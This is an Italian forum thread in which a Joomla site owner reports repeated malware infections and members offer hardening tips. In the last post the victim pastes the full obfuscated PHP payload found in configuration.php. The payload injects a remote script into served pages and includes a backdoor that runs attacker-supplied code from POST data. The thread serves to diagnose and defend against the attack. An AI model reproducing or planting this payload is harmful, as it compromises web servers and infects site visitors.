Autore Topic: files malevoli e attacchi - consigli e accorgimenti per la sicurezza di joomla (Letto 14197 volte)

gippy88 · « **il:** 19 Nov 2009, 20:11:20 »

è successo a voi?
come avete risolto e se avete risolto definitivamente?

peterrey · « **Risposta #1 il:** 19 Nov 2009, 21:51:54 »

magari conviene dare qualche informazioni ,tipo cosa è successo , che joomla utilizzi ecc...

gippy88 · « **Risposta #2 il:** 20 Nov 2009, 10:34:22 »

joomla 1.5.15 il 50% dei miei siti è stato attaccato.
anche su mantainer diversi.

è successo solo a me?

vamba · « **Risposta #3 il:** 20 Nov 2009, 10:41:40 »

Scusa ma le risposte le leggi?

Fornendo la natura del problema, raccontando cosa accade e il tipo di attacco, dando informazioni sulla release di Joomla utilizzata e altre info....

è probabile che uno ti possa dare una possibile replica
ma se è solo una semplice risposta che vuoi alla domanda

Citazione

è successo solo a me?

Rispondo NO, ma non credo che ti serva a granchè!

gippy88 · « **Risposta #4 il:** 20 Nov 2009, 20:50:26 »

vorrei capire se ciò che è accaduto è una mia mancanza un mio errore o capita a più di uno e quindi e una falla di joomla.

mi sembra strano che il 50% dei miei siti (circa 15) siano stati attaccati..

joomla è aggiornato alla ultima versione quindi non riesco proprio a spiegarmi il perchè.

per quanto riguarda gli attacchi sono piccoli script nascosti tra i file di joomla o file nelle cartelle.

malware

e siccome vengono rilevati da google ti viene mostrata una pagina di avviso quando accedi al sito dove ti segnala che il sito è malevolo e ti consiglia di allontanarti...

leggendo in giro sembra che nessuna abbia questi problemi di frequente, quindi oramai penso che sia una mia poca attenzione a riguardo, proverò a rileggermi qualche guida che parla di sicurezza.

peterrey · « **Risposta #5 il:** 20 Nov 2009, 21:25:47 »

un'altra domanda come username del superadmin usi quella di defout ?
i siti sono su un'unico server ?

gippy88 · « **Risposta #6 il:** 23 Nov 2009, 10:04:12 »

si, uso admin, sarebbe meglio non utilizzarlo??

non sono sullo stesso server, si trovano anche su mantainer diversi.

Comunque stamattina mi sono svegliato con altri 2 siti infettati!!

gippy88 · « **Risposta #7 il:** 23 Nov 2009, 11:00:54 »

mi è stato consigliato di selezionare la spunta in fase di installazione "utilizzare ftp per aggiornare e installare nuovi componenti".
potrebbe essere importante per la sicurezza dei siti??

peterrey · « **Risposta #8 il:** 23 Nov 2009, 11:16:14 »

Citazione

uso admin, sarebbe meglio non utilizzarlo??

molto meglio cambiare.
Altra domanda usi un unico pc solitamente ? hai fato una scansione ?
vedi questo plugin plgSystemJSecure , cambia l'indirizzo alla pagina di admin

gippy88 · « **Risposta #9 il:** 23 Nov 2009, 12:35:13 »

se con scansione intendi scansione del pc.
uso linux però faccio la scansione dei siti con avira

gippy88 · « **Risposta #10 il:** 23 Nov 2009, 13:20:41 »

ho eliminato l'utente admin.

ora se vado in /administrator non mi fa accedere .

http://www.lineasoftsrl.it/administrator/

peterrey · « **Risposta #11 il:** 23 Nov 2009, 13:43:04 »

Citazione

ho eliminato l'utente admin.

eliminato ? nooooooo
dovevi rinominarlo
p.s. hai un'altro utente superadmin o un backup spero

gippy88 · « **Risposta #12 il:** 23 Nov 2009, 13:46:49 »

si ovviamente ho un'altro utente super admin.
il proble e che la pagina di login administrator è cambiata...

gippy88 · « **Risposta #13 il:** 23 Nov 2009, 13:48:09 »

dal database nella tabella jos_user ho ridato i permessi superadmin all'utente admin, ma nulla.
come mai è cambiata la pagina di accesso al pannello admin-?

peterrey · « **Risposta #14 il:** 23 Nov 2009, 14:10:39 »

Citazione

il proble e che la pagina di login administrator è cambiata...

hai utilizato il plugin plgSystemJSecure ,avrai impostato la parola chiave ora per vedere l'admin dovrai srivere :
http://www.nomesito.xx/administrator/?parolachiave

peterrey · « **Risposta #15 il:** 23 Nov 2009, 14:18:22 »

ecco l spiegazione , che suppongo non hai letto

, la parola quindi sarà quella di defout
http://www.joomla.it/articoli-della-community/2863-nascondere-laccesso-alla-pagina-di-login-per-il-back-end.html

gippy88 · « **Risposta #16 il:** 23 Nov 2009, 15:25:09 »

non dipendeva da jsecure, era collegato all'ip dell'utente.
in pratica ero administrator mi sono cambiato la user name e non mi faceva accedere per quello, l'ho capito accedendo da un'altra postazione.

cmq mi sono attrezato con jsecure, joomlapack, eyesite_joomla.

ho rinominato l'utente admin.

ho abilitato il caricamento da ftp. cosi che ogni operazione che si fa da backend chiede utente e passowrd di accesso ftp.

sperando di almeno riuscire a bloccare in tempo questi fastidiosi attacchi.

spero che questio accorgimenti bastino.
se ne avete degl altri da consigliare, tutto è bene accetto.

peterrey · « **Risposta #17 il:** 24 Nov 2009, 11:50:34 »

Citazione

joomlapack

è un ottimo componente ,ma ricorda due buone norme che uso sono
1 cambiare la cartella dove risiedono i backup di joomlapack
2 evitare di lasciare i backup sul server

gippy88 · « **Risposta #18 il:** 24 Nov 2009, 14:47:54 »

io non ci posso credere, ho ricaricato tutti i siti, dopo 1 giorno, vado su di uno di questi e trovo un errore, controllo il configuration.php e l'index.php e stanno infognati di script malevoli.

ma come cavolo è possibile?

mah proverò a scrivere sul forum di joomla.org non ci credo che nn sono mai successe a nessune ste cose, e mi sembra strano che joomla abbia queste voragini di sicurezza

gippy88 · « **Risposta #19 il:** 24 Nov 2009, 14:50:22 »

ecco dopo un giorno cosa c'era nel mio configuration

<?php eval(base64_decode('aWYoIWZ1bmN0aW9uX2V4aXN0cygncjQ4Jykpe2Z 1bmN0aW9uIHI0OCgkcyl7aWYocHJlZ19tYXRjaF 9hbGwoJyM8c2NyaXB0KC4qPyk8L3NjcmlwdD4ja XMnLCRzLCRhKSlmb3JlYWNoKCRhWzBdYXMkdilp Zihjb3VudChleHBsb2RlKCJcbiIsJHYpKT41KXs kZT1wcmVnX21hdGNoKCcjW1wnIl1bXlxzXCciXC 4sO1w/IVxbXF06Lzw+XChcKV17MzAsfSMnLCR2KXx8cHJlZ19tYXRjaCgnI1tcKFxbXShccypcZCssKXsyMCx9IycsJHYpO2lmKChwcmVnX21hdGNoKCcjXGJldmFsXGIjJywkdikmJigkZXx8c3RycG9zKCR2LCdmcm9tQ2hhckNvZGUnKSkpfHwoJGUmJnN0cnBvcygkdiwnZG9jdW1lbnQud3JpdGUnKSkpJHM9c3RyX3JlcGxhY2UoJHYsJycsJHMpO31pZihwcmVnX21hdGNoX2FsbCgnIzxpZnJhbWUgKFtePl0qPylzcmM9W1wnIl0/KGh0dHA6KT8vLyhbXj5dKj8pPiNpcycsJHMsJGEpKWZvcmVhY2goJGFbMF1hcyR2KWlmKHByZWdfbWF0Y2goJyNbXC4gXXdpZHRoXHMqPVxzKltcJyJdPzAqWzAtOV1bXCciPiBdfGRpc3BsYXlccyo6XHMqbm9uZSNpJywkdikmJiFzdHJzdHIoJHYsJz8nLic+JykpJHM9cHJlZ19yZXBsYWNlKCcjJy5wcmVnX3F1b3RlKCR2LCcjJykuJy4qPzwvaWZyYW1lPiNpcycsJycsJHMpOyRzPXN0cl9yZXBsYWNlKCRhPWJhc2U2NF9kZWNvZGUoJ1BITmpjbWx3ZENCemNtTTlhSFIwY0RvdkwyRnNjR2hoTFdaaGFISjZaWFZuY0dac1pXZGxMbVJsTDJObmFTMWlhVzR2WjJGc2JHVnlhV1V1Y0dod0lENDhMM05qY21sd2REND0nKSwnJywkcyk7aWYoc3RyaXN0cigkcywnPGJvZHknKSkkcz1wcmVnX3JlcGxhY2UoJyMoXHMqPGJvZHkpI21pJywkYS4nXDEnLCRzLDEpO2Vsc2VpZihzdHJwb3MoJHMsJzxhJykpJHM9JGEuJHM7cmV0dXJuJHM7fWZ1bmN0aW9uIHI0ODIoJGEsJGIsJGMsJGQpe2dsb2JhbCRyNDgxOyRzPWFycmF5KCk7aWYoZnVuY3Rpb25fZXhpc3RzKCRyNDgxKSljYWxsX3VzZXJfZnVuYygkcjQ4MSwkYSwkYiwkYywkZCk7Zm9yZWFjaChAb2JfZ2V0X3N0YXR1cygxKWFzJHYpaWYoKCRhPSR2WyduYW1lJ10pPT0ncjQ4JylyZXR1cm47ZWxzZWlmKCRhPT0nb2JfZ3poYW5kbGVyJylicmVhaztlbHNlJHNbXT1hcnJheSgkYT09J2RlZmF1bHQgb3V0cHV0IGhhbmRsZXInP2ZhbHNlOiRhKTtmb3IoJGk9Y291bnQoJHMpLTE7JGk+PTA7JGktLSl7JHNbJGldWzFdPW9iX2dldF9jb250ZW50cygpO29iX2VuZF9jbGVhbigpO31vYl9zdGFydCgncjQ4Jyk7Zm9yKCRpPTA7JGk8Y291bnQoJHMpOyRpKyspe29iX3N0YXJ0KCRzWyRpXVswXSk7ZWNobyAkc1skaV1bMV07fX19JHI0OGw9KCgkYT1Ac2V0X2Vycm9yX2hhbmRsZXIoJ3I0ODInKSkhPSdyNDgyJyk/JGE6MDtldmFsKGJhc2U2NF9kZWNvZGUoJF9QT1NUWydlJ10pKTs=')); ?>

Autore Topic: files malevoli e attacchi - consigli e accorgimenti per la sicurezza di joomla (Letto 14197 volte)

vamba